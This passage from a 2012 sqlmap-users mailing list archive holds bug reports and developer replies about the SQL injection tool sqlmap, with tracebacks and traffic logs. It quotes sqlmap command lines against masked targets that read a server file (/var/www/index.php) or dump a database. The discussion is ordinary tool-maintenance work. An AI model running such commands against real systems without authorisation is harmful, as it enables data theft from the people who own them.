verbose level as "[TRAFFIC IN] HTTP redirect", no matter if following or
not:

[12:01:24] [TRAFFIC IN] HTTP redirect [#1] (301 Moved Permanently):
Proxy-connection: close
Set-cookie: jl_stickiness=2685012490.20480.0000; path=/
Age: 0
Server: Varnish
Via: 1.1 varnish, 1.0 157.247.180.183:8080 (squid/2.6.STABLE18)
Location: http://www.target.com
Date: Fri, 07 Dec 2012 11:00:49 GMT
Accept-ranges: bytes

Kind regards,
Miroslav Stampar

On Fri, Dec 7, 2012 at 11:58 AM, Miroslav Stampar <
mir...@gm...> wrote:

> Done ;)
>
> Bye
>
>
> On Fri, Dec 7, 2012 at 11:22 AM, Miroslav Stampar <
> mir...@gm...> wrote:
>
>> Hi.
>>
>> Sorry for waiting. Opened a new issue for this one [1]. Will try to
>> finish it today.
>>
>> Kind regards,
>> Miroslav Stampar
>>
>> [1] https://github.com/sqlmapproject/sqlmap/issues/288
>>
>> On Mon, Nov 12, 2012 at 4:20 AM, Abuse 007 <abu...@gm...> wrote:
>>
>>> Hi,
>>>
>>> When looking at HTTP Requests and Response, by using verbose level 6 (-v
>>> 6), sqlmap does not show the full HTTP response with the HTTP 302 Moved
>>> Temporarily.
>>>
>>> sqlmap got a 302 redirect to 'http://removed/removed.shtml'. Do you
>>> want to follow? [Y/n] y
>>> [14:07:02] [INFO] heuristics detected web page charset 'ascii'
>>> [14:07:02] [TRAFFIC IN] HTTP response [#2] (302 Object Moved):
>>> Connection: close
>>> Content-type: text/html
>>> Location: https://removed/removed.shtml
>>> Cache-control: private
>>> [14:07:02] [TRAFFIC IN] HTTP response [#2] (302 Moved Temporarily):
>>>
>>>
>>> In the body of the first HTTP Response, the 302 temporary redirect, is
>>> the result of the SQL injection.
>>>
>>> If I don't follow the redirection then I see the result. This is fine
>>> (to me at least), I just didn't realise or expect it at first. I expected
>>> that verbose 6 would show all of the responses, particularly those that
>>> contain the results that sqlmap is returning.
>>>
>>> Cheers,
>>> Abu
>>>
>>>
>>> ------------------------------------------------------------------------------
>>> Everyone hates slow websites. So do we.
>>> Make your web apps faster with AppDynamics
>>> Download AppDynamics Lite for free today:
>>> http://p.sf.net/sfu/appdyn_d2d_nov
>>> _______________________________________________
>>> sqlmap-users mailing list
>>> sql...@li...
>>> https://lists.sourceforge.net/lists/listinfo/sqlmap-users
>>>
>>>
>>
>>
>> --
>> Miroslav Stampar
>> http://about.me/stamparm
>>
>
>
>
> --
> Miroslav Stampar
> http://about.me/stamparm
>



-- 
Miroslav Stampar
http://about.me/stamparm

Re: [sqlmap-users] HTTP 302 Redirect Not Fully Displayed in Verbose 6 when Following Redirects

[Miroslav S. <mir...@gm...>]

Done ;)

Bye

On Fri, Dec 7, 2012 at 11:22 AM, Miroslav Stampar <
mir...@gm...> wrote:

> Hi.
>
> Sorry for waiting. Opened a new issue for this one [1]. Will try to finish
> it today.
>
> Kind regards,
> Miroslav Stampar
>
> [1] https://github.com/sqlmapproject/sqlmap/issues/288
>
> On Mon, Nov 12, 2012 at 4:20 AM, Abuse 007 <abu...@gm...> wrote:
>
>> Hi,
>>
>> When looking at HTTP Requests and Response, by using verbose level 6 (-v
>> 6), sqlmap does not show the full HTTP response with the HTTP 302 Moved
>> Temporarily.
>>
>> sqlmap got a 302 redirect to 'http://removed/removed.shtml'. Do you want
>> to follow? [Y/n] y
>> [14:07:02] [INFO] heuristics detected web page charset 'ascii'
>> [14:07:02] [TRAFFIC IN] HTTP response [#2] (302 Object Moved):
>> Connection: close
>> Content-type: text/html
>> Location: https://removed/removed.shtml
>> Cache-control: private
>> [14:07:02] [TRAFFIC IN] HTTP response [#2] (302 Moved Temporarily):
>>
>>
>> In the body of the first HTTP Response, the 302 temporary redirect, is
>> the result of the SQL injection.
>>
>> If I don't follow the redirection then I see the result. This is fine (to
>> me at least), I just didn't realise or expect it at first. I expected that
>> verbose 6 would show all of the responses, particularly those that contain
>> the results that sqlmap is returning.
>>
>> Cheers,
>> Abu
>>
>>
>> ------------------------------------------------------------------------------
>> Everyone hates slow websites. So do we.
>> Make your web apps faster with AppDynamics
>> Download AppDynamics Lite for free today:
>> http://p.sf.net/sfu/appdyn_d2d_nov
>> _______________________________________________
>> sqlmap-users mailing list
>> sql...@li...
>> https://lists.sourceforge.net/lists/listinfo/sqlmap-users
>>
>>
>
>
> --
> Miroslav Stampar
> http://about.me/stamparm
>



-- 
Miroslav Stampar
http://about.me/stamparm

Re: [sqlmap-users] HTTP 302 Redirect Not Fully Displayed in Verbose 6 when Following Redirects

[Miroslav S. <mir...@gm...>]

Hi.

Sorry for waiting. Opened a new issue for this one [1]. Will try to finish
it today.

Kind regards,
Miroslav Stampar

[1] https://github.com/sqlmapproject/sqlmap/issues/288

On Mon, Nov 12, 2012 at 4:20 AM, Abuse 007 <abu...@gm...> wrote:

> Hi,
>
> When looking at HTTP Requests and Response, by using verbose level 6 (-v
> 6), sqlmap does not show the full HTTP response with the HTTP 302 Moved
> Temporarily.
>
> sqlmap got a 302 redirect to 'http://removed/removed.shtml'. Do you want
> to follow? [Y/n] y
> [14:07:02] [INFO] heuristics detected web page charset 'ascii'
> [14:07:02] [TRAFFIC IN] HTTP response [#2] (302 Object Moved):
> Connection: close
> Content-type: text/html
> Location: https://removed/removed.shtml
> Cache-control: private
> [14:07:02] [TRAFFIC IN] HTTP response [#2] (302 Moved Temporarily):
>
>
> In the body of the first HTTP Response, the 302 temporary redirect, is the
> result of the SQL injection.
>
> If I don't follow the redirection then I see the result. This is fine (to
> me at least), I just didn't realise or expect it at first. I expected that
> verbose 6 would show all of the responses, particularly those that contain
> the results that sqlmap is returning.
>
> Cheers,
> Abu
>
>
> ------------------------------------------------------------------------------
> Everyone hates slow websites. So do we.
> Make your web apps faster with AppDynamics
> Download AppDynamics Lite for free today:
> http://p.sf.net/sfu/appdyn_d2d_nov
> _______________________________________________
> sqlmap-users mailing list
> sql...@li...
> https://lists.sourceforge.net/lists/listinfo/sqlmap-users
>
>


-- 
Miroslav Stampar
http://about.me/stamparm

Re: [sqlmap-users] File Read Exception

[Miroslav S. <mir...@gm...>]

Hi.

It should be fixed now ;)

Bye

On Fri, Dec 7, 2012 at 7:51 AM, Leon Jacobs <leo...@gm...> wrote:

> On Fri, Dec 7, 2012 at 8:49 AM, Leon Jacobs <leo...@gm...> wrote:
>
>> Hi,
>>
>> I am getting this exception when trying to read files from disk. It is
>> postgres backend. The exception occurs right after:
>>
>
>
> Apologies, sent too fast.
>
> Exception occurs right after:
>
> [08:49:29] [INFO] creating UDF 'sys_fileread' from the binary UDF file
>
>
>
>>
>>
>> sqlmap version: 1.0-dev-b5c8707
>> Python version: 2.7.2
>> Operating system: posix
>> Command line: ./sqlmap.py -u **********************************
>> --file-read=/var/www/index.php
>> Technique: STACKED
>> Back-end DBMS: PostgreSQL (fingerprinted)
>> Traceback (most recent call last):
>>   File "/sqlmap-dev/_sqlmap.py", line 73, in main
>>     start()
>>   File "/sqlmap-dev/lib/controller/controller.py", line 564, in start
>>     action()
>>   File "/sqlmap-dev/lib/controller/action.py", line 150, in action
>>     conf.dumper.rFile(conf.rFile, conf.dbmsHandler.readFile(conf.rFile))
>>   File "/sqlmap-dev/plugins/generic/filesystem.py", line 233, in readFile
>>     fileContent = self._unhexString(fileContent)
>>   File "/sqlmap-dev/plugins/generic/filesystem.py", line 40, in
>> _unhexString
>>     if len(hexStr) % 2 != 0:
>> TypeError: object of type 'NoneType' has no len()
>>
>> [*] shutting down at 08:46:11
>>
>
> --
> Regards
> L.
>
> Sent using electronic mail ツ
>
>
> ------------------------------------------------------------------------------
> LogMeIn Rescue: Anywhere, Anytime Remote support for IT. Free Trial
> Remotely access PCs and mobile devices and provide instant support
> Improve your efficiency, and focus on delivering more value-add services
> Discover what IT Professionals Know. Rescue delivers
> http://p.sf.net/sfu/logmein_12329d2d
> _______________________________________________
> sqlmap-users mailing list
> sql...@li...
> https://lists.sourceforge.net/lists/listinfo/sqlmap-users
>
>


-- 
Miroslav Stampar
http://about.me/stamparm

Re: [sqlmap-users] File Read Exception

[Leon J. <leo...@gm...>]

On Fri, Dec 7, 2012 at 8:49 AM, Leon Jacobs <leo...@gm...> wrote:

> Hi,
>
> I am getting this exception when trying to read files from disk. It is
> postgres backend. The exception occurs right after:
>


Apologies, sent too fast.

Exception occurs right after:

[08:49:29] [INFO] creating UDF 'sys_fileread' from the binary UDF file



>
>
> sqlmap version: 1.0-dev-b5c8707
> Python version: 2.7.2
> Operating system: posix
> Command line: ./sqlmap.py -u **********************************
> --file-read=/var/www/index.php
> Technique: STACKED
> Back-end DBMS: PostgreSQL (fingerprinted)
> Traceback (most recent call last):
>   File "/sqlmap-dev/_sqlmap.py", line 73, in main
>     start()
>   File "/sqlmap-dev/lib/controller/controller.py", line 564, in start
>     action()
>   File "/sqlmap-dev/lib/controller/action.py", line 150, in action
>     conf.dumper.rFile(conf.rFile, conf.dbmsHandler.readFile(conf.rFile))
>   File "/sqlmap-dev/plugins/generic/filesystem.py", line 233, in readFile
>     fileContent = self._unhexString(fileContent)
>   File "/sqlmap-dev/plugins/generic/filesystem.py", line 40, in
> _unhexString
>     if len(hexStr) % 2 != 0:
> TypeError: object of type 'NoneType' has no len()
>
> [*] shutting down at 08:46:11
>

-- 
Regards
L.

Sent using electronic mail ツ

[sqlmap-users] File Read Exception

[Leon J. <leo...@gm...>]

Hi,

I am getting this exception when trying to read files from disk. It is
postgres backend. The exception occurs right after:


sqlmap version: 1.0-dev-b5c8707
Python version: 2.7.2
Operating system: posix
Command line: ./sqlmap.py -u **********************************
--file-read=/var/www/index.php
Technique: STACKED
Back-end DBMS: PostgreSQL (fingerprinted)
Traceback (most recent call last):
  File "/sqlmap-dev/_sqlmap.py", line 73, in main
    start()
  File "/sqlmap-dev/lib/controller/controller.py", line 564, in start
    action()
  File "/sqlmap-dev/lib/controller/action.py", line 150, in action
    conf.dumper.rFile(conf.rFile, conf.dbmsHandler.readFile(conf.rFile))
  File "/sqlmap-dev/plugins/generic/filesystem.py", line 233, in readFile
    fileContent = self._unhexString(fileContent)
  File "/sqlmap-dev/plugins/generic/filesystem.py", line 40, in _unhexString
    if len(hexStr) % 2 != 0:
TypeError: object of type 'NoneType' has no len()

[*] shutting down at 08:46:11

-- 
Regards
L.

Sent using electronic mail ツ

Re: [sqlmap-users] Bug report: unhandled exception in sqlmap/1.0-dev-6ea07f7

[Miroslav S. <mir...@gm...>]

Hi Alexander.

I can see what's happening (at first glance it seems obvious, but it's
really not :). It would be a tromendous help if you could send me a traffic
file (just append --fresh-queries -t traffic.txt to those parameters used)
where this happens.

Kind regards,
Miroslav Stampar

On Fri, Nov 30, 2012 at 10:05 AM, Miroslav Stampar <
mir...@gm...> wrote:

> Hi.
>
> Thank you for your report. This moment opened a new issue for it [1]. Will
> keep you posted.
>
> Kind regards,
> Miroslav Stampar
>
> [1] https://github.com/sqlmapproject/sqlmap/issues/268
>
>
> On Fri, Nov 30, 2012 at 7:49 AM, Alexander Hagenah <ah...@pr...>wrote:
>
>>
>> -----BEGIN PGP SIGNED MESSAGE-----
>> Hash: SHA1
>>
>> Hi List,
>>
>> another glitch I ran into. Let me know if you need further info.
>>
>> [07:47:38] [ERROR] thread MainThread: unhandled exception in
>> sqlmap/1.0-dev-6ea07f7, retry your run with the latest development
>> version from the GitHub repository. If the exception persists, please
>> send by e-mail to 'sql...@li...' or open a new
>> issue at 'https://github.com/sqlmapproject/sqlmap/issues/new' with the
>> following text and any information required to reproduce the bug. The
>> developers will try to reproduce the bug, fix it accordingly and get
>> back to you.
>> sqlmap version: 1.0-dev-6ea07f7
>> Python version: 2.7.3rc2
>> Operating system: posix
>> Command line: ./sqlmap.py -u
>> ******************************************** -D *********** --dump
>> Technique: ERROR
>> Back-end DBMS: MySQL (fingerprinted)
>> Traceback (most recent call last):
>>   File "/home/tools/sqlmap/lib/core/threads.py", line 130, in runThreads
>>     threadFunction()
>>   File "/home/tools/sqlmap/lib/techniques/error/use.py", line 387, in
>> errorThread
>>     output = __errorFields(expression, expressionFields,
>> expressionFieldsList, num, emptyFields)
>>   File "/home/tools/sqlmap/lib/techniques/error/use.py", line 181, in
>> __errorFields
>>     output = NULL if emptyFields and field in emptyFields else
>> __oneShotErrorUse(expressionReplaced, field)
>>   File "/home/tools/sqlmap/lib/techniques/error/use.py", line 95, in
>> __oneShotErrorUse
>>     page, headers = Request.queryPage(payload, content=True)
>>   File "/home/tools/sqlmap/lib/request/connect.py", line 764, in queryPage
>>     page, headers, code = Connect.getPage(url=uri, get=get, post=post,
>> cookie=cookie, ua=ua, referer=referer, host=host, silent=silent,
>> method=method, auxHeaders=auxHeaders, response=response,
>> raise404=raise404, ignoreTimeout=timeBasedCompare)
>>   File "/home/tools/sqlmap/lib/request/connect.py", line 402, in getPage
>>     return Connect.__getPageProxy(**kwargs)
>>   File "/home/tools/sqlmap/lib/request/connect.py", line 91, in
>> __getPageProxy
>>     return Connect.getPage(**kwargs)
>>   File "/home/tools/sqlmap/lib/request/connect.py", line 348, in getPage
>>     conn = urllib2.urlopen(req)
>>   File "/usr/lib/python2.7/urllib2.py", line 126, in urlopen
>>     return _opener.open(url, data, timeout)
>>   File "/usr/lib/python2.7/urllib2.py", line 400, in open
>>     response = self._open(req, data)
>>   File "/usr/lib/python2.7/urllib2.py", line 418, in _open
>>     '_open', req)
>>   File "/usr/lib/python2.7/urllib2.py", line 378, in _call_chain
>>     result = func(*args)
>>   File "/usr/lib/python2.7/urllib2.py", line 1207, in http_open
>>     return self.do_open(httplib.HTTPConnection, req)
>>   File "/usr/lib/python2.7/urllib2.py", line 1146, in do_open
>>     h = http_class(host, timeout=req.timeout) # will parse host:port
>>   File "/usr/lib/python2.7/httplib.py", line 693, in __init__
>>     self._set_hostport(host, port)
>>   File "/usr/lib/python2.7/httplib.py", line 721, in _set_hostport
>>     raise InvalidURL("nonnumeric port: '%s'" % host[i+1:])
>> InvalidURL: nonnumeric port: '1' for key 'group_key''
>>
>> - --
>> Alexander Hagenah
>>
>> Dubai, UAE.
>> Mobile:    +971 (0)50 6448151
>>
>> Key ID (2048bit): 0x354C0DDB
>> Fingerprint: FBA1 439F 7343 3729 18AF D62C 54DE FD22 354C 0DDB
>> -----BEGIN PGP SIGNATURE-----
>> Version: GnuPG v1.4.11 (GNU/Linux)
>>
>> iEYEARECAAYFAlC4VvoACgkQVN79IjVMDdtgVgCfQVTWmGlFVp2jjMocRBz4/oc6
>> Q/YAninIAZxlOx4XbJogvE9OPnPIKLDN
>> =wBp/
>> -----END PGP SIGNATURE-----
>>
>>
>>
>> ------------------------------------------------------------------------------
>> Keep yourself connected to Go Parallel:
>> TUNE You got it built. Now make it sing. Tune shows you how.
>> http://goparallel.sourceforge.net
>> _______________________________________________
>> sqlmap-users mailing list
>> sql...@li...
>> https://lists.sourceforge.net/lists/listinfo/sqlmap-users
>>
>
>
>
> --
> Miroslav Stampar
> http://about.me/stamparm
>



-- 
Miroslav Stampar
http://about.me/stamparm

Re: [sqlmap-users] Bug report: unhandled exception in sqlmap/1.0-dev-6ea07f7

[Miroslav S. <mir...@gm...>]

Hi.

Thank you for your report. This moment opened a new issue for it [1]. Will
keep you posted.

Kind regards,
Miroslav Stampar

[1] https://github.com/sqlmapproject/sqlmap/issues/268

On Fri, Nov 30, 2012 at 7:49 AM, Alexander Hagenah <ah...@pr...> wrote:

>
> -----BEGIN PGP SIGNED MESSAGE-----
> Hash: SHA1
>
> Hi List,
>
> another glitch I ran into. Let me know if you need further info.
>
> [07:47:38] [ERROR] thread MainThread: unhandled exception in
> sqlmap/1.0-dev-6ea07f7, retry your run with the latest development
> version from the GitHub repository. If the exception persists, please
> send by e-mail to 'sql...@li...' or open a new
> issue at 'https://github.com/sqlmapproject/sqlmap/issues/new' with the
> following text and any information required to reproduce the bug. The
> developers will try to reproduce the bug, fix it accordingly and get
> back to you.
> sqlmap version: 1.0-dev-6ea07f7
> Python version: 2.7.3rc2
> Operating system: posix
> Command line: ./sqlmap.py -u
> ******************************************** -D *********** --dump
> Technique: ERROR
> Back-end DBMS: MySQL (fingerprinted)
> Traceback (most recent call last):
>   File "/home/tools/sqlmap/lib/core/threads.py", line 130, in runThreads
>     threadFunction()
>   File "/home/tools/sqlmap/lib/techniques/error/use.py", line 387, in
> errorThread
>     output = __errorFields(expression, expressionFields,
> expressionFieldsList, num, emptyFields)
>   File "/home/tools/sqlmap/lib/techniques/error/use.py", line 181, in
> __errorFields
>     output = NULL if emptyFields and field in emptyFields else
> __oneShotErrorUse(expressionReplaced, field)
>   File "/home/tools/sqlmap/lib/techniques/error/use.py", line 95, in
> __oneShotErrorUse
>     page, headers = Request.queryPage(payload, content=True)
>   File "/home/tools/sqlmap/lib/request/connect.py", line 764, in queryPage
>     page, headers, code = Connect.getPage(url=uri, get=get, post=post,
> cookie=cookie, ua=ua, referer=referer, host=host, silent=silent,
> method=method, auxHeaders=auxHeaders, response=response,
> raise404=raise404, ignoreTimeout=timeBasedCompare)
>   File "/home/tools/sqlmap/lib/request/connect.py", line 402, in getPage
>     return Connect.__getPageProxy(**kwargs)
>   File "/home/tools/sqlmap/lib/request/connect.py", line 91, in
> __getPageProxy
>     return Connect.getPage(**kwargs)
>   File "/home/tools/sqlmap/lib/request/connect.py", line 348, in getPage
>     conn = urllib2.urlopen(req)
>   File "/usr/lib/python2.7/urllib2.py", line 126, in urlopen
>     return _opener.open(url, data, timeout)
>   File "/usr/lib/python2.7/urllib2.py", line 400, in open
>     response = self._open(req, data)
>   File "/usr/lib/python2.7/urllib2.py", line 418, in _open
>     '_open', req)
>   File "/usr/lib/python2.7/urllib2.py", line 378, in _call_chain
>     result = func(*args)
>   File "/usr/lib/python2.7/urllib2.py", line 1207, in http_open
>     return self.do_open(httplib.HTTPConnection, req)
>   File "/usr/lib/python2.7/urllib2.py", line 1146, in do_open
>     h = http_class(host, timeout=req.timeout) # will parse host:port
>   File "/usr/lib/python2.7/httplib.py", line 693, in __init__
>     self._set_hostport(host, port)
>   File "/usr/lib/python2.7/httplib.py", line 721, in _set_hostport
>     raise InvalidURL("nonnumeric port: '%s'" % host[i+1:])
> InvalidURL: nonnumeric port: '1' for key 'group_key''
>
> - --
> Alexander Hagenah
>
> Dubai, UAE.
> Mobile:    +971 (0)50 6448151
>
> Key ID (2048bit): 0x354C0DDB
> Fingerprint: FBA1 439F 7343 3729 18AF D62C 54DE FD22 354C 0DDB
> -----BEGIN PGP SIGNATURE-----
> Version: GnuPG v1.4.11 (GNU/Linux)
>
> iEYEARECAAYFAlC4VvoACgkQVN79IjVMDdtgVgCfQVTWmGlFVp2jjMocRBz4/oc6
> Q/YAninIAZxlOx4XbJogvE9OPnPIKLDN
> =wBp/
> -----END PGP SIGNATURE-----
>
>
>
> ------------------------------------------------------------------------------
> Keep yourself connected to Go Parallel:
> TUNE You got it built. Now make it sing. Tune shows you how.
> http://goparallel.sourceforge.net
> _______________________________________________
> sqlmap-users mailing list
> sql...@li...
> https://lists.sourceforge.net/lists/listinfo/sqlmap-users
>



-- 
Miroslav Stampar
http://about.me/stamparm

[sqlmap-users] Bug report: unhandled exception in sqlmap/1.0-dev-6ea07f7

[Alexander H. <ah...@pr...>]

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

Hi List,

another glitch I ran into. Let me know if you need further info.

[07:47:38] [ERROR] thread MainThread: unhandled exception in
sqlmap/1.0-dev-6ea07f7, retry your run with the latest development
version from the GitHub repository. If the exception persists, please
send by e-mail to 'sql...@li...' or open a new
issue at 'https://github.com/sqlmapproject/sqlmap/issues/new' with the
following text and any information required to reproduce the bug. The
developers will try to reproduce the bug, fix it accordingly and get
back to you.
sqlmap version: 1.0-dev-6ea07f7
Python version: 2.7.3rc2
Operating system: posix
Command line: ./sqlmap.py -u
******************************************** -D *********** --dump
Technique: ERROR
Back-end DBMS: MySQL (fingerprinted)
Traceback (most recent call last):
  File "/home/tools/sqlmap/lib/core/threads.py", line 130, in runThreads
    threadFunction()
  File "/home/tools/sqlmap/lib/techniques/error/use.py", line 387, in
errorThread
    output = __errorFields(expression, expressionFields,
expressionFieldsList, num, emptyFields)
  File "/home/tools/sqlmap/lib/techniques/error/use.py", line 181, in
__errorFields
    output = NULL if emptyFields and field in emptyFields else
__oneShotErrorUse(expressionReplaced, field)
  File "/home/tools/sqlmap/lib/techniques/error/use.py", line 95, in
__oneShotErrorUse
    page, headers = Request.queryPage(payload, content=True)
  File "/home/tools/sqlmap/lib/request/connect.py", line 764, in queryPage
    page, headers, code = Connect.getPage(url=uri, get=get, post=post,
cookie=cookie, ua=ua, referer=referer, host=host, silent=silent,
method=method, auxHeaders=auxHeaders, response=response,
raise404=raise404, ignoreTimeout=timeBasedCompare)
  File "/home/tools/sqlmap/lib/request/connect.py", line 402, in getPage
    return Connect.__getPageProxy(**kwargs)
  File "/home/tools/sqlmap/lib/request/connect.py", line 91, in
__getPageProxy
    return Connect.getPage(**kwargs)
  File "/home/tools/sqlmap/lib/request/connect.py", line 348, in getPage
    conn = urllib2.urlopen(req)
  File "/usr/lib/python2.7/urllib2.py", line 126, in urlopen
    return _opener.open(url, data, timeout)
  File "/usr/lib/python2.7/urllib2.py", line 400, in open
    response = self._open(req, data)
  File "/usr/lib/python2.7/urllib2.py", line 418, in _open
    '_open', req)
  File "/usr/lib/python2.7/urllib2.py", line 378, in _call_chain
    result = func(*args)
  File "/usr/lib/python2.7/urllib2.py", line 1207, in http_open
    return self.do_open(httplib.HTTPConnection, req)
  File "/usr/lib/python2.7/urllib2.py", line 1146, in do_open
    h = http_class(host, timeout=req.timeout) # will parse host:port
  File "/usr/lib/python2.7/httplib.py", line 693, in __init__
    self._set_hostport(host, port)
  File "/usr/lib/python2.7/httplib.py", line 721, in _set_hostport
    raise InvalidURL("nonnumeric port: '%s'" % host[i+1:])
InvalidURL: nonnumeric port: '1' for key 'group_key''

- -- 
Alexander Hagenah

Dubai, UAE.
Mobile:    +971 (0)50 6448151

Key ID (2048bit): 0x354C0DDB
Fingerprint: FBA1 439F 7343 3729 18AF D62C 54DE FD22 354C 0DDB
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.11 (GNU/Linux)

iEYEARECAAYFAlC4VvoACgkQVN79IjVMDdtgVgCfQVTWmGlFVp2jjMocRBz4/oc6
Q/YAninIAZxlOx4XbJogvE9OPnPIKLDN
=wBp/
-----END PGP SIGNATURE-----